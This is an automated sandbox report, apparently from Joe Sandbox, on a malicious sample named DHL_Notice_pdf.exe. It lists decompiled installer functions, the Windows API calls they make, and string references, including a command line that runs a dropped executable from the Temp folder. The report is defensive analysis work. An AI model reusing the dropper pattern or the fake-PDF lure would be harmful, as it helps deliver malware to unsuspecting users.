                                                            				_v16 = _t78;
                                                            				_v12 = 0;
                                                            				_v8 = E00404734;
                                                            				if(_t110 != 2) {
                                                            					_v8 = E004046FA;
                                                            				}
                                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                            				_push(0x22);
                                                            				E004045C4(_a4);
                                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                            				_push(0x23);
                                                            				E004045C4(_a4);
                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                            				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                                            				E004045F9(_t118);
                                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                                            				_t92 =  *( *0x42a270 + 0x68);
                                                            				if(_t92 < 0) {
                                                            					_t92 = GetSysColor( ~_t92);
                                                            				}
                                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                            				 *0x421714 = 0;
                                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                            				 *0x421714 = 0;
                                                            				return 0;
                                                            			}



















                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                            • GetDlgItem.USER32 ref: 00404835
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                            • GetSysColor.USER32(?), ref: 00404863
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                            • GetDlgItem.USER32 ref: 004048FF
                                                            • SendMessageW.USER32(00000000), ref: 00404906
                                                            • GetDlgItem.USER32 ref: 00404931
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                            • SetCursor.USER32(00000000), ref: 00404985
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                            • SetCursor.USER32(00000000), ref: 004049A1
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                            Strings
                                                            • N, xrefs: 0040491F
                                                            • "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t, xrefs: 00404960
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$N
                                                            • API String ID: 3103080414-3325198878
                                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004062AE(void* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				long _t12;
                                                            				long _t24;
                                                            				char* _t31;
                                                            				int _t37;
                                                            				void* _t38;
                                                            				intOrPtr* _t39;
                                                            				long _t42;
                                                            				WCHAR* _t44;
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t53;
                                                            
                                                            				_t38 = __ecx;
                                                            				_t44 =  *(_t52 + 0x14);
                                                            				 *0x426de8 = 0x55004e;
                                                            				 *0x426dec = 0x4c;
                                                            				if(_t44 == 0) {
                                                            					L3:
                                                            					_t2 = _t52 + 0x1c; // 0x4275e8
                                                            					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                            						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                            						_t53 = _t52 + 0x10;
                                                            						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                            						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                            						_t48 = _t12;
                                                            						 *(_t53 + 0x18) = _t48;
                                                            						if(_t48 != 0xffffffff) {
                                                            							_t42 = GetFileSize(_t48, 0);
                                                            							_t6 = _t37 + 0xa; // 0xa
                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                            							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                            								L18:
                                                            								return CloseHandle(_t48);
                                                            							} else {
                                                            								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                            									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                            									if(_t49 == 0) {
                                                            										_t48 =  *(_t53 + 0x18);
                                                            										L16:
                                                            										_t24 = _t42;
                                                            										L17:
                                                            										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                            										E0040620A(_t48, _t46, _t42 + _t37);
                                                            										GlobalFree(_t46);
                                                            										goto L18;
                                                            									}
                                                            									_t39 = _t46 + _t42;
                                                            									_t31 = _t39 + _t37;
                                                            									while(_t39 > _t49) {
                                                            										 *_t31 =  *_t39;
                                                            										_t31 = _t31 - 1;
                                                            										_t39 = _t39 - 1;
                                                            									}
                                                            									_t24 = _t49 - _t46 + 1;
                                                            									_t48 =  *(_t53 + 0x18);
                                                            									goto L17;
                                                            								}
                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                            								_t42 = _t42 + 0xa;
                                                            								goto L16;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					CloseHandle(E00406158(_t44, 0, 1));
                                                            					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            				return _t12;
                                                            			}




















                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                            • wsprintfA.USER32 ref: 0040632D
                                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                            • GlobalFree.KERNEL32 ref: 00406416
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 0040615C
                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                            • API String ID: 2171350718-2295842750
                                                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				struct tagRECT _v32;
                                                            				struct tagPAINTSTRUCT _v96;
                                                            				struct HDC__* _t70;
                                                            				struct HBRUSH__* _t87;
                                                            				struct HFONT__* _t94;
                                                            				long _t102;
                                                            				signed int _t126;
                                                            				struct HDC__* _t128;
                                                            				intOrPtr _t130;
                                                            
                                                            				if(_a8 == 0xf) {
                                                            					_t130 =  *0x42a270;
                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                            					_a8 = _t70;
                                                            					GetClientRect(_a4,  &_v32);
                                                            					_t126 = _v32.bottom;
                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                            					while(_v32.top < _t126) {
                                                            						_a12 = _t126 - _v32.top;
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                            						_v32.bottom = _v32.bottom + 4;
                                                            						_a16 = _t87;
                                                            						FillRect(_a8,  &_v32, _t87);
                                                            						DeleteObject(_a16);
                                                            						_v32.top = _v32.top + 4;
                                                            					}
                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                            						_a16 = _t94;
                                                            						if(_t94 != 0) {
                                                            							_t128 = _a8;
                                                            							_v32.left = 0x10;
                                                            							_v32.top = 8;
                                                            							SetBkMode(_t128, 1);
                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                            							_a8 = SelectObject(_t128, _a16);
                                                            							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                            							SelectObject(_t128, _a8);
                                                            							DeleteObject(_a16);
                                                            						}
                                                            					}
                                                            					EndPaint(_a4,  &_v96);
                                                            					return 0;
                                                            				}
                                                            				_t102 = _a16;
                                                            				if(_a8 == 0x46) {
                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                            				}
                                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                            			}














                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32 ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32 ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                            				struct _ITEMIDLIST* _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				signed int _t44;
                                                            				WCHAR* _t45;
                                                            				signed char _t47;
                                                            				signed int _t48;
                                                            				short _t59;
                                                            				short _t61;
                                                            				short _t63;
                                                            				void* _t71;
                                                            				signed int _t77;
                                                            				signed int _t78;
                                                            				short _t81;
                                                            				short _t82;
                                                            				signed char _t84;
                                                            				signed int _t85;
                                                            				void* _t98;
                                                            				void* _t104;
                                                            				intOrPtr* _t105;
                                                            				void* _t107;
                                                            				WCHAR* _t108;
                                                            				void* _t110;
                                                            
                                                            				_t107 = __esi;
                                                            				_t104 = __edi;
                                                            				_t71 = __ebx;
                                                            				_t44 = _a8;
                                                            				if(_t44 < 0) {
                                                            					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                            				}
                                                            				_push(_t71);
                                                            				_push(_t107);
                                                            				_push(_t104);
                                                            				_t105 =  *0x42a298 + _t44 * 2;
                                                            				_t45 = 0x428200;
                                                            				_t108 = 0x428200;
                                                            				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                            					_t108 = _a4;
                                                            					_a4 = _a4 & 0x00000000;
                                                            				}
                                                            				_t81 =  *_t105;
                                                            				_a8 = _t81;
                                                            				if(_t81 == 0) {
                                                            					L43:
                                                            					 *_t108 =  *_t108 & 0x00000000;
                                                            					if(_a4 == 0) {
                                                            						return _t45;
                                                            					}
                                                            					return E00406668(_a4, _t45);
                                                            				} else {
                                                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                            						_t98 = 2;
                                                            						_t105 = _t105 + _t98;
                                                            						if(_t81 >= 4) {
                                                            							if(__eflags != 0) {
                                                            								 *_t108 = _t81;
                                                            								_t108 = _t108 + _t98;
                                                            								__eflags = _t108;
                                                            							} else {
                                                            								 *_t108 =  *_t105;
                                                            								_t108 = _t108 + _t98;
                                                            								_t105 = _t105 + _t98;
                                                            							}
                                                            							L42:
                                                            							_t82 =  *_t105;
                                                            							_a8 = _t82;
                                                            							if(_t82 != 0) {
                                                            								_t81 = _a8;
                                                            								continue;
                                                            							}
                                                            							goto L43;
                                                            						}
                                                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                            						_t47 =  *_t105;
                                                            						_t48 = _t47 & 0x000000ff;
                                                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                            						_t85 = _t84 & 0x000000ff;
                                                            						_v28 = _t48 | 0x00008000;
                                                            						_t77 = 2;
                                                            						_v16 = _t85;
                                                            						_t105 = _t105 + _t77;
                                                            						_v24 = _t48;
                                                            						_v20 = _t85 | 0x00008000;
                                                            						if(_a8 != _t77) {
                                                            							__eflags = _a8 - 3;
                                                            							if(_a8 != 3) {
                                                            								__eflags = _a8 - 1;
                                                            								if(__eflags == 0) {
                                                            									__eflags = (_t48 | 0xffffffff) - _v12;
                                                            									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                            								}
                                                            								L38:
                                                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                            								_t45 = 0x428200;
                                                            								goto L42;
                                                            							}
                                                            							_t78 = _v12;
                                                            							__eflags = _t78 - 0x1d;
                                                            							if(_t78 != 0x1d) {
                                                            								__eflags = (_t78 << 0xb) + 0x42b000;
                                                            								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                            							} else {
                                                            								E004065AF(_t108,  *0x42a268);
                                                            							}
                                                            							__eflags = _t78 + 0xffffffeb - 7;
                                                            							if(__eflags < 0) {
                                                            								L29:
                                                            								E004068EF(_t108);
                                                            							}
                                                            							goto L38;
                                                            						}
                                                            						if( *0x42a2e4 != 0) {
                                                            							_t77 = 4;
                                                            						}
                                                            						_t121 = _t48;
                                                            						if(_t48 >= 0) {
                                                            							__eflags = _t48 - 0x25;
                                                            							if(_t48 != 0x25) {
                                                            								__eflags = _t48 - 0x24;
                                                            								if(_t48 == 0x24) {
                                                            									GetWindowsDirectoryW(_t108, 0x400);
                                                            									_t77 = 0;
                                                            								}
                                                            								while(1) {
                                                            									__eflags = _t77;
                                                            									if(_t77 == 0) {
                                                            										goto L26;
                                                            									}
                                                            									_t59 =  *0x42a264;
                                                            									_t77 = _t77 - 1;
                                                            									__eflags = _t59;
                                                            									if(_t59 == 0) {
                                                            										L22:
                                                            										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                            										__eflags = _t61;
                                                            										if(_t61 != 0) {
                                                            											L24:
                                                            											 *_t108 =  *_t108 & 0x00000000;
                                                            											__eflags =  *_t108;
                                                            											continue;
                                                            										}
                                                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                            										_a8 = _t61;
                                                            										__imp__CoTaskMemFree(_v8);
                                                            										__eflags = _a8;
                                                            										if(_a8 != 0) {
                                                            											goto L26;
                                                            										}
                                                            										goto L24;
                                                            									}
                                                            									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                            									__eflags = _t63;
                                                            									if(_t63 == 0) {
                                                            										goto L26;
                                                            									}
                                                            									goto L22;
                                                            								}
                                                            								goto L26;
                                                            							}
                                                            							GetSystemDirectoryW(_t108, 0x400);
                                                            							goto L26;
                                                            						} else {
                                                            							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                            							if( *_t108 != 0) {
                                                            								L27:
                                                            								if(_v16 == 0x1a) {
                                                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                            								}
                                                            								goto L29;
                                                            							}
                                                            							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                            							L26:
                                                            							if( *_t108 == 0) {
                                                            								goto L29;
                                                            							}
                                                            							goto L27;
                                                            						}
                                                            					}
                                                            					goto L43;
                                                            				}
                                                            			}






























                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000400), ref: 004067C0
                                                            • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                            • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 4260037668-4103729154
                                                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004056CA(signed int _a4, WCHAR* _a8) {
                                                            				struct HWND__* _v8;
                                                            				signed int _v12;
                                                            				WCHAR* _v32;
                                                            				long _v44;
                                                            				int _v48;
                                                            				void* _v52;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				WCHAR* _t27;
                                                            				signed int _t28;
                                                            				long _t29;
                                                            				signed int _t37;
                                                            				signed int _t38;
                                                            
                                                            				_t27 =  *0x429244;
                                                            				_v8 = _t27;
                                                            				if(_t27 != 0) {
                                                            					_t37 =  *0x42a314;
                                                            					_v12 = _t37;
                                                            					_t38 = _t37 & 0x00000001;
                                                            					if(_t38 == 0) {
                                                            						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                            					}
                                                            					_t27 = lstrlenW(0x422728);
                                                            					_a4 = _t27;
                                                            					if(_a8 == 0) {
                                                            						L6:
                                                            						if((_v12 & 0x00000004) == 0) {
                                                            							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                            						}
                                                            						if((_v12 & 0x00000002) == 0) {
                                                            							_v32 = 0x422728;
                                                            							_v52 = 1;
                                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                            							_v44 = 0;
                                                            							_v48 = _t29 - _t38;
                                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                            						}
                                                            						if(_t38 != 0) {
                                                            							_t28 = _a4;
                                                            							0x422728[_t28] = 0;
                                                            							return _t28;
                                                            						}
                                                            					} else {
                                                            						_t27 = lstrlenW(_a8) + _a4;
                                                            						if(_t27 < 0x1000) {
                                                            							_t27 = lstrcatW(0x422728, _a8);
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t27;
                                                            			}


















                                                            APIs
                                                            • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
